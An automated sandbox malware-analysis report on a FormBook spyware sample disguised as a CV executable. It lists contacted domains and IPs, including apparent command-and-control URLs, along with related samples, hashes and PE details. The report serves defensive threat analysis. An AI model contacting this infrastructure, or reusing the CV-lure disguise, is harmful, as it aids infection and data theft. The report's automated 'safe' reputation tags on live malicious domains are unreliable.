                                  https://duckduckgo.com/ac/?q=TSTheme.exe, 0000000F.00000003.1649817749.0000000008328000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://reg.ruTSTheme.exe, 0000000F.00000002.3664896761.0000000006DBC000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003B7C000.00000004.00000001.00040000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.instagram.com/hover_domainsTSTheme.exe, 0000000F.00000002.3666682659.0000000008050000.00000004.00000800.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006F4E000.00000004.10000000.00040000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006774000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003534000.00000004.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003D0E000.00000004.00000001.00040000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.reg.ru/domain/new/?utm_source=www.theppelin.online&utm_medium=parking&utm_campaign=s_lanTSTheme.exe, 0000000F.00000002.3664896761.0000000006DBC000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003B7C000.00000004.00000001.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=TSTheme.exe, 0000000F.00000003.1649817749.0000000008328000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://push.zhanzhang.baidu.com/push.jsTSTheme.exe, 0000000F.00000002.3664896761.0000000006A98000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003858000.00000004.00000001.00040000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.shengniu.comOZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3665046974.0000000004945000.00000040.80000000.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.google.comTSTheme.exe, 0000000F.00000002.3664896761.00000000062BE000.00000004.10000000.00040000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006450000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.000000000307E000.00000004.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003210000.00000004.00000001.00040000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.hover.com/domains/resultsTSTheme.exe, 0000000F.00000002.3666682659.0000000008050000.00000004.00000800.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006F4E000.00000004.10000000.00040000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006774000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003534000.00000004.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003D0E000.00000004.00000001.00040000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchTSTheme.exe, 0000000F.00000003.1649817749.0000000008328000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://www.reg.ru/web-sites/?utm_source=www.theppelin.online&utm_medium=parking&utm_campaign=s_landTSTheme.exe, 0000000F.00000002.3664896761.0000000006DBC000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003B7C000.00000004.00000001.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.cssTSTheme.exe, 0000000F.00000002.3664896761.0000000006906000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.00000000036C6000.00000004.00000001.00040000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameCurriculum Vitae Catalina Munoz.exe, 00000000.00000002.1203989758.0000000002DF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://www.reg.ru/web-sites/website-builder/?utm_source=www.theppelin.online&utm_medium=parking&utmTSTheme.exe, 0000000F.00000002.3664896761.0000000006DBC000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003B7C000.00000004.00000001.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://twitter.com/hoverTSTheme.exe, 0000000F.00000002.3666682659.0000000008050000.00000004.00000800.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006F4E000.00000004.10000000.00040000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006774000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003534000.00000004.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003D0E000.00000004.00000001.00040000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.reg.ru/whois/?check=&dname=www.theppelin.online&amp;reg_source=parking_autoTSTheme.exe, 0000000F.00000002.3664896761.0000000006DBC000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003B7C000.00000004.00000001.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoTSTheme.exe, 0000000F.00000003.1649817749.0000000008328000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.reg.ru/dedicated/?utm_source=www.theppelin.online&utm_medium=parking&utm_campaign=s_landTSTheme.exe, 0000000F.00000002.3664896761.0000000006DBC000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003B7C000.00000004.00000001.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.reg.ru/hosting/?utm_source=www.theppelin.online&utm_medium=parking&utm_campaign=s_land_hTSTheme.exe, 0000000F.00000002.3664896761.0000000006DBC000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003B7C000.00000004.00000001.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=TSTheme.exe, 0000000F.00000003.1649817749.0000000008328000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://zz.bdstatic.com/linksubmit/push.jsTSTheme.exe, 0000000F.00000002.3664896761.0000000006A98000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003858000.00000004.00000001.00040000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-TSTheme.exe, 0000000F.00000002.3664896761.0000000006DBC000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003B7C000.00000004.00000001.00040000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.ecosia.org/newtab/TSTheme.exe, 0000000F.00000003.1649817749.0000000008328000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://parking.reg.ru/script/get_domain_data?domain_name=www.theppelin.online&rand=TSTheme.exe, 0000000F.00000002.3664896761.0000000006DBC000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003B7C000.00000004.00000001.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://ac.ecosia.org/autocomplete?q=TSTheme.exe, 0000000F.00000003.1649817749.0000000008328000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://kernelphysics.com/w912/?4h=vZKT0BokUz0Nxao4mcSjanYirAH1q7MhbEC9IATSTheme.exe, 0000000F.00000002.3664896761.0000000006C2A000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.00000000039EA000.00000004.00000001.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=TSTheme.exe, 0000000F.00000003.1649817749.0000000008328000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  203.161.43.228
                                  		www.getmall.onlineMalaysia
                                  		45899VNPT-AS-VNVNPTCorpVNfalse
                                  104.21.81.245
                                  		www.lets-goo.ruUnited States
                                  		13335CLOUDFLARENETUSfalse
                                  193.201.190.93
                                  		gett.huUnited Kingdom
                                  		25546BROOKLANDCOMP-ASGBfalse
                                  45.64.187.212
                                  		www.kernelphysics.comThailand
                                  		58955BANGMODENTERPRISE-THBangmodEnterpriseCoLtdTHfalse
                                  188.114.96.3
                                  		www.uqdr.cnEuropean Union
                                  		13335CLOUDFLARENETUSfalse
                                  152.32.189.143
                                  		www.shengniu.comHong Kong
                                  		135377UHGL-AS-APUCloudHKHoldingsGroupLimitedHKfalse
                                  69.57.162.24
                                  		emgeecontracting.shopUnited States
                                  		25653FORTRESSITXUSfalse
                                  194.58.112.174
                                  		www.theppelin.onlineRussian Federation
                                  		197695AS-REGRUfalse
                                  124.156.151.111
                                  		www.crxwdix.storeSingapore
                                  		132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNtrue
                                  3.33.130.190
                                  		duobao698.comUnited States
                                  		8987AMAZONEXPANSIONGBfalse
                                  199.59.243.225
                                  		www.drdavidglassman.comUnited States
                                  		395082BODIS-NJUSfalse
                                  216.40.34.41
                                  		www.botcsllc.comCanada
                                  		15348TUCOWSCAfalse

                                  General Information

                                  Joe Sandbox version:40.0.0 Tourmaline
                                  Analysis ID:1447923
                                  Start date and time:2024-05-27 12:32:38 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 11m 22s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:22
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:2
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:Curriculum Vitae Catalina Munoz.exe
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.evad.winEXE@7/1@16/12
                                  EGA Information:
                                  • Successful, ratio: 75%
                                  HCA Information:
                                  • Successful, ratio: 98%
                                  • Number of executed functions: 134
                                  • Number of non-executed functions: 315
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                  Warnings

                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                  • Execution Graph export aborted for target OZCzxhvCDDlUqJnCoH.exe, PID 400 because it is empty
                                  • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                  • Report size exceeded maximum capacity and may have missing behavior information.

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  06:33:25API Interceptor9x Sleep call for process: Curriculum Vitae Catalina Munoz.exe modified
                                  08:32:05API Interceptor9172880x Sleep call for process: TSTheme.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  203.161.43.228PI No 20000814C.exeGet hashmaliciousFormBookBrowse
                                  • www.anoldshow.top/ii3e/
                                  sDcscN5fmS.exeGet hashmaliciousFormBookBrowse
                                  • www.ctlz.xyz/adch/
                                  SSDQ115980924.exeGet hashmaliciousFormBookBrowse
                                  • www.anoldshow.top/ii3e/
                                  d35g770B2W.exeGet hashmaliciousFormBookBrowse
                                  • www.techfirm.life/q3aw/?LDYd_=QZ64&2fO8I=65j+Em8vbA0b9ekPzADfPJ8qOVfxx3g9agcyFrOK9tIOe4qFVeCIrHPiCIBKLeJhX3EQelscWW4TvORgVFTDtdFzn8UaxdcH4Idbqnu/6VNQBz4yhQsJX3o=
                                  file.exeGet hashmaliciousFormBookBrowse
                                  • www.firmshow.top/02nb/
                                  Curriculum Vitae Catalina Munoz.exeGet hashmaliciousFormBookBrowse
                                  • www.getmall.online/sdqf/
                                  bin.exeGet hashmaliciousFormBookBrowse
                                  • www.foramy.live/xrqi/
                                  193.201.190.93Curriculum Vitae Catalina Munoz.exeGet hashmaliciousFormBookBrowse
                                  • www.gett.hu/1df8/
                                  45.64.187.212Curriculum Vitae Catalina Munoz.exeGet hashmaliciousFormBookBrowse
                                  • www.kernelphysics.com/w912/
                                  188.114.96.3http://y6ss1.shop/Get hashmaliciousUnknownBrowse
                                  • y6ss1.shop/l/gaz/videos/gaz-platform-preview.mp4
                                  http://newclaim-dannx-creat.promodaget.my.id/Get hashmaliciousUnknownBrowse
                                  • newclaim-dannx-creat.promodaget.my.id/
                                  http://worker-quiet-cherry-3fda.cbb2856.workers.dev/favicon.icoGet hashmaliciousHTMLPhisherBrowse
                                  • worker-quiet-cherry-3fda.cbb2856.workers.dev/favicon.ico
                                  SecuriteInfo.com.Win64.Evo-gen.30302.14698.exeGet hashmaliciousCryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
                                  • fleur-de-lis.sbs/jhgfd
                                  KT-L068310.exeGet hashmaliciousFormBookBrowse
                                  • www.barrettdigitalart.com/i319/
                                  http://cfg3xe.pages.dev/Get hashmaliciousUnknownBrowse
                                  • cfg3xe.pages.dev/
                                  http://amht38eh3e3f98ox0ld1rc4h3fjcowz98ldjp5hek8.pages.dev/Get hashmaliciousUnknownBrowse
                                  • amht38eh3e3f98ox0ld1rc4h3fjcowz98ldjp5hek8.pages.dev/
                                  G5N0mtxJLN.exeGet hashmaliciousLokibotBrowse
                                  • rocheholding.top/evie3/five/fre.php
                                  Purchase Order # PO-00159.xla.xlsxGet hashmaliciousUnknownBrowse
                                  • qr-in.com/YXcuqXy
                                  LHER000698175.xlsGet hashmaliciousUnknownBrowse
                                  • qr-in.com/JeYCrvM

                                  Domains

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  www.theppelin.onlineCurriculum Vitae Catalina Munoz.exeGet hashmaliciousFormBookBrowse
                                  • 194.58.112.174
                                  94950.bodis.comShipping Document.exeGet hashmaliciousFormBookBrowse
                                  • 199.59.243.225
                                  PAYMENT ADVICE.exeGet hashmaliciousFormBookBrowse
                                  • 199.59.243.225
                                  USD46k Swift_PDF.exeGet hashmaliciousFormBookBrowse
                                  • 199.59.243.225
                                  CIPL_TD2024_INV086.exeGet hashmaliciousFormBookBrowse
                                  • 199.59.243.225
                                  Swift_USD103,700.exeGet hashmaliciousFormBookBrowse
                                  • 199.59.243.225
                                  NEW PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
                                  • 199.59.243.225
                                  Purchase Order_17052024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                  • 199.59.243.225
                                  URGENT BANK ACCOUNT.exeGet hashmaliciousFormBookBrowse
                                  • 199.59.243.225
                                  Purchase Order_21052024.exeGet hashmaliciousFormBookBrowse
                                  • 199.59.243.225
                                  m735YSFaZM.exeGet hashmaliciousFormBookBrowse
                                  • 199.59.243.225
                                  www.drdavidglassman.comPAYMENT COPY.exeGet hashmaliciousFormBookBrowse
                                  • 199.59.243.225
                                  Curriculum Vitae Catalina Munoz.exeGet hashmaliciousFormBookBrowse
                                  • 199.59.243.225
                                  www.botcsllc.comPI No 20000814C.exeGet hashmaliciousFormBookBrowse
                                  • 216.40.34.41
                                  SSDQ115980924.exeGet hashmaliciousFormBookBrowse
                                  • 216.40.34.41
                                  Curriculum Vitae Catalina Munoz.exeGet hashmaliciousFormBookBrowse
                                  • 216.40.34.41
                                  www.crxwdix.storeCurriculum Vitae Catalina Munoz.exeGet hashmaliciousFormBookBrowse
                                  • 119.28.81.48
                                  www.uqdr.cnCurriculum Vitae Catalina Munoz.exeGet hashmaliciousFormBookBrowse
                                  • 188.114.97.3
                                  www.getmall.onlineCurriculum Vitae Catalina Munoz.exeGet hashmaliciousFormBookBrowse
                                  • 203.161.43.228
                                  www.kohfour.comPDA-APPOINTMENT-LETTER-DOCX.exeGet hashmaliciousFormBookBrowse
                                  • 216.40.34.41
                                  Curriculum Vitae Catalina Munoz.exeGet hashmaliciousFormBookBrowse
                                  • 216.40.34.41
                                  INVOICE-#0000898876-PDF.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                  • 216.40.34.41

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  VNPT-AS-VNVNPTCorpVNShipping Document.exeGet hashmaliciousFormBookBrowse
                                  • 203.161.43.227
                                  PAYMENT ADVICE.exeGet hashmaliciousFormBookBrowse
                                  • 203.161.43.227
                                  RFQ _ARC 101011-24.exeGet hashmaliciousFormBookBrowse
                                  • 203.161.49.193
                                  URocnz2wNj.elfGet hashmaliciousUnknownBrowse
                                  • 113.184.12.157
                                  3LI2VAvf26.elfGet hashmaliciousUnknownBrowse
                                  • 14.161.21.248
                                  h73eD4sruD.elfGet hashmaliciousUnknownBrowse
                                  • 14.250.168.229
                                  wNJM6XQwaZ.elfGet hashmaliciousUnknownBrowse
                                  • 123.30.215.217
                                  n4WgIM7VfS.elfGet hashmaliciousMiraiBrowse
                                  • 123.17.251.239
                                  http://worker-frosty-surf-7141.parvgee90.workers.dev/favicon.icoGet hashmaliciousHTMLPhisherBrowse
                                  • 203.161.57.106
                                  http://worker-office-onedrive.td5xtn-b1lv7f1ymscd0.workers.dev/favicon.icoGet hashmaliciousHTMLPhisherBrowse
                                  • 203.161.57.106
                                  BANGMODENTERPRISE-THBangmodEnterpriseCoLtdTHCurriculum Vitae Catalina Munoz.exeGet hashmaliciousFormBookBrowse
                                  • 45.64.187.212
                                  x86-20231215-0039.elfGet hashmaliciousMiraiBrowse
                                  • 103.86.49.46
                                  https://u13483264.ct.sendgrid.net/ls/click?upn=-2F4-2BLwJoBRv5dSFfm2SWdlq1xVKqS5VSF-2BoVslHSwVVRzC-2FnEDyzEz9-2BiGffQffqoH9jjvp3Irq3ILlZFz2SkecxQUldy2CWJtPzMpqDsfOk-3DFueZ_eJn5HwSci7Ktkcda8nZrAFXIFf7NzHrEvgRmDa2aG7nbho7-2FY2Dfm7DCdY3xLvoee7u11jSQLXFneCCMcBgPUALg0IuVBxQixqN0bM5jrSJEZl73eQqmmjUJIorlM5-2FqzAjatzFM12B1roGgn1o1q8-2BBZi7PkURgDb9-2B3sDTdD5bYaNW9JQEXiYUjDpMn9V9sBWLZLikkQNX1rqkWLSsLA-3D-3DGet hashmaliciousUnknownBrowse
                                  • 103.27.200.239
                                  KBDYAK.exeGet hashmaliciousEmotetBrowse
                                  • 103.86.49.11
                                  vOiDcQpLqX.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 103.27.200.173
                                  a26aed7d.exeGet hashmaliciousEmotetBrowse
                                  • 103.86.49.11
                                  C84.exeGet hashmaliciousDCRatBrowse
                                  • 103.27.202.127
                                  Punchgod.exeGet hashmaliciousNanocoreBrowse
                                  • 27.254.163.12
                                  kopa42.exeGet hashmaliciousEmotetBrowse
                                  • 103.86.49.11
                                  607_23207129.xlsmGet hashmaliciousHidden Macro 4.0 EmotetBrowse
                                  • 116.204.183.194
                                  CLOUDFLARENETUSGestorRemesasCONFIRMIMING.exeGet hashmaliciousAgentTeslaBrowse
                                  • 172.67.74.152
                                  inquiry EBS# 82785.exeGet hashmaliciousFormBookBrowse
                                  • 104.21.81.34
                                  DRAWING_SHEET_P02405912916 .exeGet hashmaliciousAgentTeslaBrowse
                                  • 172.67.74.152
                                  PAYMENT COPY.exeGet hashmaliciousFormBookBrowse
                                  • 172.67.137.210
                                  Shipping Document.exeGet hashmaliciousFormBookBrowse
                                  • 172.67.190.203
                                  NUEVA ORDEN DE COMPRAsxlx..exeGet hashmaliciousSnake KeyloggerBrowse
                                  • 188.114.96.3
                                  PAYMENT ADVICE.exeGet hashmaliciousFormBookBrowse
                                  • 172.67.190.203
                                  proforma invoice.bit.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  • 172.67.74.152
                                  INV 0983 OSY 240524_PDF.exeGet hashmaliciousAgentTeslaBrowse
                                  • 104.26.12.205
                                  ZAMOWIEN.EXE.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                  • 172.67.190.76
                                  BROOKLANDCOMP-ASGBCurriculum Vitae Catalina Munoz.exeGet hashmaliciousFormBookBrowse
                                  • 193.201.190.93
                                  SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dllGet hashmaliciousCobaltStrikeBrowse
                                  • 193.201.188.48
                                  wYvY74B2kG.elfGet hashmaliciousUnknownBrowse
                                  • 193.201.184.100
                                  78UgzepwBVGet hashmaliciousMiraiBrowse
                                  • 193.201.184.115
                                  CLOUDFLARENETUSGestorRemesasCONFIRMIMING.exeGet hashmaliciousAgentTeslaBrowse
                                  • 172.67.74.152
                                  inquiry EBS# 82785.exeGet hashmaliciousFormBookBrowse
                                  • 104.21.81.34
                                  DRAWING_SHEET_P02405912916 .exeGet hashmaliciousAgentTeslaBrowse
                                  • 172.67.74.152
                                  PAYMENT COPY.exeGet hashmaliciousFormBookBrowse
                                  • 172.67.137.210
                                  Shipping Document.exeGet hashmaliciousFormBookBrowse
                                  • 172.67.190.203
                                  NUEVA ORDEN DE COMPRAsxlx..exeGet hashmaliciousSnake KeyloggerBrowse
                                  • 188.114.96.3
                                  PAYMENT ADVICE.exeGet hashmaliciousFormBookBrowse
                                  • 172.67.190.203
                                  proforma invoice.bit.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  • 172.67.74.152
                                  INV 0983 OSY 240524_PDF.exeGet hashmaliciousAgentTeslaBrowse
                                  • 104.26.12.205
                                  ZAMOWIEN.EXE.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                  • 172.67.190.76

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\Users\user\AppData\Local\Temp\63u1Q-P

                                  Download File
                                  Process:C:\Windows\SysWOW64\TSTheme.exe
                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                  Category:modified
                                  Size (bytes):196608
                                  Entropy (8bit):1.1215420383712111
                                  Encrypted:false
                                  SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                  MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                  SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                  SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                  SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                  Malicious:false
                                  Reputation:moderate, very likely benign file
                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Entropy (8bit):7.953034241429125
                                  TrID:
                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                  • DOS Executable Generic (2002/1) 0.01%
                                  File name:Curriculum Vitae Catalina Munoz.exe
                                  File size:734'720 bytes
                                  MD5:1f690a7d24c0c325d681db7d114520d4
                                  SHA1:cb3b2bcbfac8d1426d1c9c77294bbb8eff766be0
                                  SHA256:af04493ff5e1ece516e1a68ba430e7b280a0bb3a7671433e357612b510ca98fb
                                  SHA512:a330fba7e4a5f58459b1cc9b037967bafa26bcd858331f16e9473d2c90eb0601ffd2b561494546ec31b38cd1859c5acfd9a2291706467b229948cd3236422c02
                                  SSDEEP:12288:lV5YrhC4xhTwqoU5OIc++asfonFXsoVhSZSmQIfdsJ+S79vTX5jHrpBTGdnSQI0U:7IXbUqBJtEc8oVLFPRxTxPadnSQ1S7A
                                  TLSH:3DF4122A73743D6FCB7D1AF65890898023F19A1B1912F2C84EF650E209E5FF4AF11987
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Pf.................,..........bK... ...`....@.. ....................................@................................

                                  File Icon

                                  Icon Hash:00928e8e8686b000

                                  Static PE Info

                                  General

                                  Entrypoint:0x4b4b62
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x6650E311 [Fri May 24 18:57:21 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                  Entrypoint Preview

                                  Instruction
                                  jmp dword ptr [00402000h]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
